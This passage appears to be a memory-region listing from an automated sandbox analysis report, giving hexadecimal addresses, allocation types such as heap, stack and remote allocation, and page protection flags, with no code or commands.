page read and write
|
||
|
1A0C8B60000
|
heap
|
page read and write
|
||
|
2293BD80000
|
heap
|
page read and write
|
||
|
5E2F58B000
|
stack
|
page read and write
|
||
|
5E2F40E000
|
stack
|
page read and write
|
||
|
2293BE4D000
|
heap
|
page read and write
|
||
|
35D5000
|
heap
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
5111000
|
trusted library allocation
|
page read and write
|
||
|
1A0DA921000
|
trusted library allocation
|
page read and write
|
||
|
1A0C8B57000
|
heap
|
page read and write
|
||
|
7D2E000
|
stack
|
page read and write
|
||
|
2293BD29000
|
heap
|
page read and write
|
||
|
2293C1D1000
|
heap
|
page read and write
|
||
|
209AE000
|
stack
|
page read and write
|
||
|
8EB0000
|
trusted library allocation
|
page read and write
|
||
|
1A0CBD79000
|
trusted library allocation
|
page read and write
|
||
|
20B3D000
|
stack
|
page read and write
|
||
|
2293BE18000
|
heap
|
page read and write
|
||
|
2293B9A0000
|
remote allocation
|
page read and write
|
||
|
2293C12A000
|
heap
|
page read and write
|
||
|
1A0CB1E1000
|
trusted library allocation
|
page read and write
|
||
|
35A0000
|
heap
|
page read and write
|
||
|
5497000
|
heap
|
page read and write
|
||
|
2293C040000
|
heap
|
page read and write
|
||
|
2293BD4B000
|
heap
|
page read and write
|
||
|
5858EFE000
|
stack
|
page read and write
|
||
|
88D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
34DE000
|
stack
|
page read and write
|
||
|
9870000
|
direct allocation
|
page execute and read and write
|
||
|
2293C096000
|
heap
|
page read and write
|
||
|
54FC000
|
heap
|
page read and write
|
||
|
1A0C8B28000
|
heap
|
page read and write
|
||
|
15A10870000
|
heap
|
page read and write
|
||
|
2293C0F6000
|
heap
|
page read and write
|
||
|
7F040000
|
trusted library allocation
|
page execute and read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
5100000
|
heap
|
page read and write
|
||
|
7E60000
|
trusted library allocation
|
page read and write
|
||
|
54FD000
|
heap
|
page read and write
|
||
|
2293BD79000
|
heap
|
page read and write
|
||
|
7AB0000
|
heap
|
page read and write
|
||
|
2293BE6D000
|
heap
|
page read and write
|
||
|
2293BE5D000
|
heap
|
page read and write
|
||
|
3560000
|
trusted library allocation
|
page read and write
|
||
|
5E2F38E000
|
stack
|
page read and write
|
||
|
33BA000
|
heap
|
page read and write
|
||
|
1A0E3160000
|
heap
|
page read and write
|
||
|
1A0E2F04000
|
heap
|
page read and write
|
||
|
1A0CB0A5000
|
trusted library allocation
|
page read and write
|
||
|
2293BE55000
|
heap
|
page read and write
|
||
|
5920000
|
trusted library allocation
|
page read and write
|
||
|
1A0CA4B0000
|
heap
|
page read and write
|
||
|
4FFE000
|
stack
|
page read and write
|
||
|
2293C0BA000
|
heap
|
page read and write
|
||
|
7ACA000
|
heap
|
page read and write
|
||
|
2293C0E0000
|
heap
|
page read and write
|
||
|
7A5D000
|
heap
|
page read and write
|
||
|
1A0CADAE000
|
trusted library allocation
|
page read and write
|
||
|
2293C0FA000
|
heap
|
page read and write
|
||
|
35AE000
|
heap
|
page read and write
|
||
|
22939E68000
|
heap
|
page read and write
|
||
|
1A0E2EFC000
|
heap
|
page read and write
|
||
|
2293BE15000
|
heap
|
page read and write
|
||
|
3572000
|
trusted library allocation
|
page read and write
|
||
|
1A0CAE12000
|
trusted library allocation
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
899E000
|
stack
|
page read and write
|
||
|
2293C0BA000
|
heap
|
page read and write
|
||
|
34F0000
|
heap
|
page read and write
|
||
|
58590FB000
|
stack
|
page read and write
|
||
|
3540000
|
trusted library allocation
|
page read and write
|
||
|
1A0C8BA0000
|
heap
|
page read and write
|
||
|
323C000
|
stack
|
page read and write
|
||
|
2293C156000
|
heap
|
page read and write
|
||
|
2293BD83000
|
heap
|
page read and write
|
||
|
20550000
|
direct allocation
|
page read and write
|
||
|
2293BE2D000
|
heap
|
page read and write
|
||
|
895D000
|
stack
|
page read and write
|
||
|
2293BD01000
|
heap
|
page read and write
|
||
|
3622000
|
heap
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FD1000
|
trusted library allocation
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
8F70000
|
trusted library allocation
|
page read and write
|
||
|
8F10000
|
direct allocation
|
page read and write
|
||
|
7DF427DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A0CA510000
|
trusted library allocation
|
page read and write
|
||
|
2293C0BA000
|
heap
|
page read and write
|
||
|
8C65000
|
trusted library allocation
|
page read and write
|
||
|
5440000
|
heap
|
page read and write
|
||
|
22939E40000
|
heap
|
page read and write
|
||
|
89D0000
|
heap
|
page read and write
|
||
|
2293C0E0000
|
heap
|
page read and write
|
||
|
2293C0F6000
|
heap
|
page read and write
|
||
|
54C0000
|
heap
|
page read and write
|
||
|
327D000
|
stack
|
page read and write
|
||
|
2293BD70000
|
heap
|
page read and write
|
||
|
2293BE01000
|
heap
|
page read and write
|
||
|
5E2DF63000
|
stack
|
page read and write
|
||
|
1A0C8E90000
|
heap
|
page read and write
|
||
|
2293BD98000
|
heap
|
page read and write
|
||
|
2B7E000
|
stack
|
page read and write
|
||
|
7CC0000
|
trusted library allocation
|
page read and write
|
||
|
2293C13D000
|
heap
|
page read and write
|
||
|
15A1093A000
|
heap
|
page read and write
|
||
|
2293BD4B000
|
heap
|
page read and write
|
||
|
1A0CAFDE000
|
trusted library allocation
|
page read and write
|
||
|
2293BD3D000
|
heap
|
page read and write
|
||
|
2293C067000
|
heap
|
page read and write
|
||
|
15A10890000
|
heap
|
page read and write
|
||
|
35E1000
|
heap
|
page read and write
|
||
|
349E000
|
stack
|
page read and write
|
||
|
2293BE28000
|
heap
|
page read and write
|
||
|
6173000
|
trusted library allocation
|
page read and write
|
||
|
20510000
|
direct allocation
|
page read and write
|
||
|
2293BE1D000
|
heap
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
3575000
|
trusted library allocation
|
page execute and read and write
|
||
|
2293BEB6000
|
heap
|
page read and write
|
||
|
1A0CAD9C000
|
trusted library allocation
|
page read and write
|
||
|
2293BEB6000
|
heap
|
page read and write
|
||
|
20D6C000
|
stack
|
page read and write
|
||
|
1A0E2C60000
|
heap
|
page read and write
|
||
|
2293BD83000
|
heap
|
page read and write
|
||
|
2293BD7B000
|
heap
|
page read and write
|
||
|
2293C221000
|
heap
|
page read and write
|
||
|
8ED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2293BD01000
|
heap
|
page read and write
|
||
|
2293C0B5000
|
heap
|
page read and write
|
||
|
3FA1000
|
remote allocation
|
page execute and read and write
|
||
|
20BFC000
|
stack
|
page read and write
|
||
|
1A0E2E60000
|
heap
|
page read and write
|
||
|
54BF000
|
heap
|
page read and write
|
||
|
6121000
|
trusted library allocation
|
page read and write
|
||
|
2293BE08000
|
heap
|
page read and write
|
||
|
2293BE20000
|
heap
|
page read and write
|
||
|
1A0C8B5C000
|
heap
|
page read and write
|
There are 720 hidden memdumps, click here to show them.